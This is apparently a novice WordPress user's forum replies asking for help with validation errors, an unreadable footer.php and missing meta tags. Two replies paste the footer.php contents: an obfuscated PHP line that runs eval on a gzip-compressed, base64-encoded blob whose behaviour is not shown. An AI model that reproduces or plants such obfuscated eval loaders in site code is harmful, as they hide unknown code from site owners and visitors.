daneault23
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: footer.php error please help meI also have a footer.php problem. I checked my site using the validator and I only have 3 errors left to fix, but they are in my footer I think. When I went into my footer.php this is what I see:
<?php eval(gzinflate(base64_decode(‘bU89C8IwEN3zK45MujSDm6YpKA4iThUcpTVXU2hNSE5D++s11qk4Pd7dvY8rFJO6fUGrc95YS+i5YuXhVO6Pqx2cDfYI9QCyAuOxybkhcmshajuO+Biym+25+hEpKgVbb593Q/80McYsOkqWofGISSw4UEsd5vxivXYeQ5hCA1fzSfJnTIpPXTWHwhkH0V2nFxbLDRRpWVs9JDTUd+p7xOAN’)));?>
However, in my errors for the validator it says: Line 499, Column 5: end tag for element “div” which is not open.
</div>Line 499, Column 6: XML Parsing Error: Opening and ending tag mismatch: body line 51 and div.
</div>Line 507, Column 7: XML Parsing Error: Opening and ending tag mismatch: html line 2 and body.
</body>So yeah, I think it’s coming from my footer.php except when I go to it, it’s a bunch of letters and numbers. What do I do?
My site’s here if you wanna check it out: http://www.ilovemoneymorethanyou.com
Thanks
Forum: Themes and Templates
In reply to: Can’t find how/where to fix these errors!great.. well that sucks… yea i was pretty sure it wasn’t supposed to look like that..
Forum: Themes and Templates
In reply to: Can’t find how/where to fix these errors!When I looked in my footer.php this is what is there:
<?php eval(gzinflate(base64_decode(‘bU89C8IwEN3zK45MujSDm6YpKA4iThUcpTVXU2hNSE5D++s11qk4Pd7dvY8rFJO6fUGrc95YS+i5YuXhVO6Pqx2cDfYI9QCyAuOxybkhcmshajuO+Biym+25+hEpKgVbb593Q/80McYsOkqWofGISSw4UEsd5vxivXYeQ5hCA1fzSfJnTIpPXTWHwhkH0V2nFxbLDRRpWVs9JDTUd+p7xOAN’)));?>I have no idea what that is. I then looked in my index.php and I saw there was 3 </div> tags in a row and I deleted the last two, and checked the page and it said it was still the same. I don’t wanna mess up the page so I still have one </div> left. This is what it looks like now:
<?php
get_header();
?>
<?php get_sidebar(); ?><!– start index–>
<div id=”main”>
<div class=”main-text”><?php if (have_posts()) : while (have_posts()) : the_post(); ?>
<h1>” rel=”bookmark”><?php the_title(); ?></h1>
<div class=”date”>
<span class=”post-cat”>Posted in: <?php the_category(‘,’) ?></span> | <span class=”post-date”> <?php the_time(‘F jS, Y’) ?></span>
</div><?php the_content(__(‘(more…)’)); ?>
<?php wp_link_pages(); ?>
<div class=”komentar”><?php comments_popup_link(‘No Comments »’, ‘1 Comment »’, ‘% Comments »’); ?></div><?php comments_template(); // Get wp-comments.php template ?>
<?php endwhile; else: ?>
<p><?php _e(‘Sorry, no posts matched your criteria.’); ?></p>
<?php endif; ?><?php posts_nav_link(‘ — ‘, __(‘« Older Posts’), __(‘Newer Posts »’)); ?>
</div><?php get_footer(); ?>
Do you see the last </div> after the “?>” above. I don’t know what to do. Thanks for your help though.
Forum: Fixing WordPress
In reply to: Description Meta TagsI have a similar problem. Except I have wp 2.5.1 not 2.7. I have the all in one seo plugin with description and keywords in there, but I don’t have meta tags. How do I add them so google can find my site? I just remembered that when I go to current theme options I can put the description and keywords in there, but it doesn’t seem to do anything. This has been a big problem for me, and I went to a couple sites and they checked my site and said I didn’t have any meta tags when I thought I did. Apparently I don’t know what I’m doing. Help please.